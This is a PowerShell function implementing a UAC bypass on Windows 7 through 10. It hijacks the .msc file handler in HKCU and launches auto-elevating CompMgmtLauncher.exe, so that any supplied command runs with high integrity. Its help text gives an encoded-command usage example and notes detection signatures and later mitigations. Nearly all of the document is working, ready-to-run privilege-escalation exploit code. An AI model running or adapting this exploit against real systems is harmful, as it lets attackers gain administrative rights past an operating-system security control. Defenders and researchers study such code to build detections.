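function Invoke-CompMgmtLauncherBypass {
<#
.SYNOPSIS

Uses CompMgmtLauncher.exe to bypass UAC by performing an image hijack on the .msc file extension
Tested on Windows 7, Windows 8.1, and Windows 10

This is an identical issue to the eventvwr.exe bypass found by Matt Nelson, but in CompMgmtLauncher.exe.
Credit goes to Matt Nelson (@enigma0x3) for the original vuln and writeup:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

Slight modification to target CompMgmtLauncher.exe: mrfuzzy
Original Author: Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Writes the supplied command line as the default value of
HKCU:\Software\Classes\mscfile\shell\open\command, launches CompMgmtLauncher.exe
from the System directory, waits five seconds for the hijacked .msc handler to
run, then removes HKCU:\Software\Classes\mscfile and stops CompMgmtLauncher.exe
if it is still running. Cleanup runs even if launching the binary fails, so the
staged handler is not left behind.

Caveats a practitioner should know:
  - The staging write is to HKCU, so no elevation is needed to perform it; that
    write is also the high-signal artifact. Creation of
    HKCU\Software\Classes\mscfile\shell\open\command by a process other than
    mmc.exe is a widely used detection for this family of bypasses. Later
    Windows 10 builds are reported to have mitigated this technique -- confirm
    on the target build rather than relying on the "Tested on" line above.
  - The technique relies on UAC auto-elevation, which only applies to members
    of the local Administrators group; the function does not check this.
  - -Force overwrites an existing mscfile handler, and the cleanup deletes the
    whole HKCU:\Software\Classes\mscfile key. A pre-existing user-defined
    handler is NOT restored.
  - -Command is written verbatim as the handler and is not validated.

.PARAMETER Command

Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc "

.PARAMETER Force

Overwrite HKCU:\Software\Classes\mscfile\shell\open\command if it already has a
default value. Without -Force the function returns without making any change
when that value exists.

.EXAMPLE

Invoke-CompMgmtLauncherBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="

This will write out "Is Elevated: True" to C:\UACBypassTest.txt.

#>

    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
    Param (
        [Parameter(Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $Command,

        [Switch]
        $Force
    )

    $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"

    # Stage the hijack: the default value of this key is what the shell runs
    # for .msc files. Refuse to clobber an existing handler unless -Force.
    $existing = Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue
    if (-not $Force -and ($null -ne $existing)) {
        Write-Verbose "Key already exists, consider using -Force"
        # 'return', not 'exit': 'exit' inside a function terminates the
        # caller's PowerShell host/session, not just this function.
        return
    }

    New-Item $mscCommandPath -Force |
        New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null

    if (-not (Test-Path $mscCommandPath)) {
        Write-Warning "Failed to create registry key, exiting"
        return
    }
    Write-Verbose "Created registry entries to hijack the msc extension"

    $CompMgmtLauncherPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'CompMgmtLauncher.exe'

    # $Process stays $null when ShouldProcess declines (-WhatIf, or Confirm
    # answered "no"); the cleanup below checks for that before dereferencing.
    $Process = $null

    try {
        # Launch CompMgmtLauncher.exe (not Event Viewer). It opens its .msc
        # through the file-association handler written above.
        if ($PSCmdlet.ShouldProcess($CompMgmtLauncherPath, 'Start process')) {
            $Process = Start-Process -FilePath $CompMgmtLauncherPath -PassThru
            Write-Verbose "Started CompMgmtLauncher.exe"
        }

        # Give the launched process time to resolve and run the handler before
        # the key is removed. Skipped under -WhatIf since nothing was started.
        Write-Verbose "Sleeping 5 seconds to trigger payload"
        if (-not $PSBoundParameters['WhatIf']) {
            Start-Sleep -Seconds 5
        }
    }
    finally {
        # Always runs -- including when Start-Process throws (e.g. binary
        # missing) -- so the hijacked handler is never left staged in HKCU.
        # Note this removes the whole mscfile key, not just the value written
        # above; a pre-existing user handler is not restored.
        $mscfilePath = "HKCU:\Software\Classes\mscfile"
        if (Test-Path $mscfilePath) {
            Remove-Item $mscfilePath -Recurse -Force
            Write-Verbose "Removed registry entries"
        }

        if ($Process -and (Get-Process -Id $Process.Id -ErrorAction SilentlyContinue)) {
            Stop-Process -Id $Process.Id
            Write-Verbose "Killed running CompMgmtLauncher process"
        }
    }
}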